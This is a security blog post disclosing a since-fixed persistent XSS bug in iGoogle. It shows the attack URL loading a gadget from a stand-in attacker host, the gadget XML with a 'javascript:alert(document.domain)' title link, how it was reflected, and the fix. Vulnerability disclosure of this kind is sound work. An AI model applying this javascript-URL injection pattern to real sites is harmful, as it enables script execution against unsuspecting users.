Kos SecurityA blog about security.

Hacking Google – Part 1

Vulnerability: Cross Site Scripting

Affects: all browsers.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.

Authentication Status: both unauth and auth

 

URL used in attack
http://www.google.com/ig/adde?moduleurl=attacker.com/payload.xml&source=lpep&mkhp=0

attacker.com/payload.xml:
<ModulePrefs author="Kyle" author_email=""
        description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
        screenshot="http://www.google.com/images/firefox/sprite2.png"
        title_url="javascript:alert(document.domain);"  title="[TITLE OF GADGET]" height="165">
        <Require feature="setprefs" />
        <Require feature="views" />
        <Require feature="dynamic-height" />
....
</ModulePrefs>

How it’s reflected on the page:

....
<a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a>
....
(The "Hax" string below is the title of the gadget, which was what the reflected link above is)

Resolution

This issue was resolved very quickly.
Google now just replaces anything that doesn’t have a protocol of http or https with the path the file is hosted on.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/

No comments posted.

Leave a Reply

Your email address will not be published. Required fields are marked *


× 9 = twenty seven

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>